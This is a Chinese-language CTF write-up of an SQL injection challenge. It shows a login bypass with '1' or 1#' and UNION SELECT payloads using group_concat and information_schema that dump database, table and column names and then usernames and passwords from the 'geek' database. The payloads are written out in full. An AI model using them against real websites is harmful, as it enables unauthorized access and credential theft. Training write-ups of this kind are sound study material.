前言,个人认为这是一道比较好的题目,很好的考察了我们sql注入的基本功,以及对基本题型的分析能力。
1.打开链接,我们看到这个,尝试使用语句1' or 1#看看是否可以登录
?2.确实可以登录。
我们尝试用这个用户名和密码登录,发现同样显示这个页面,发现密码有点异常,32位数字字母组合加密,应该是md5,但是不可逆解密,所以我们需要另换方法。
3.这个页面其实有点像sqli-labs上前面题目的模型,尝试找注入点,在前面用户名和后面密码上看看能不能动手脚
我在末尾加入了单引号,发现报错,再输入--+发现仍然报错,所以我们换%23(一个注释不管就多试几遍,一开始因为没换注释而在这里踩了好久的坑)?,发现可以正常回显了,因此我们需要的是闭合单引号然后在后面写新的sql语句
这边我试了一下加双引号会怎样(与题无关,为一个疑惑)
?直接报错,我一开始以为是双引号被当做密码来执行了,现在想想,好像只要被双引号包含的单引号或者被单引号包含的双引号,只要是包含在里面的东西,都会被当做参数值来执行,除非两个单引号或者两个双引号。//个人的神奇理解,反正是写给自己看的,你们不懂就算。
4.接下来,便可以注入了
order by......然后找回显点
然后select
?所以说,这里为什么要考验基本功了,附上这些语句
查库
select schema_name from information_schema.schemata;
查表
select table_name from information_schema.tables where table_schema='数据库名';
查列
select column_name from information_schema.columns where table_name='表名';
查数据
select 列名 from 库名.表名
//注意我所加的单引号和双引号!!不能缺少
单独的select database() 与select schema_name from information_schema.schemata效果一样
而当和group_concat用的时候,应该用后者,后者可以爆出所有数据,而前者只能爆出有限个。
所以我们在后面加上语句
'union select 1,2,group_concat(schema_name) from information_schema.schemata%23
//记得让前面的语句为假爆出了库名
%27union%20select%201,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23
//提交的时候如果感觉没问题,却一直报错,不妨看看hackbar提交的数据之间有没有空格
//血的教训啊好,我们又爆出了表名
?其实我们根据题意,大概知道了答案肯定在后者里面,继续爆列名
%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns where%20table_name=%27l0ve1ysq1%27%23
?好,继续爆表名
%27union%20select%201,2,group_concat(id,username,password)%20from%20geek.l0ve1ysq1%23
//再次补充血的教训,如果不group_concat的话很容易会有一些数据出不来......
好了,好像有点看不清楚,查看源代码,搞出flag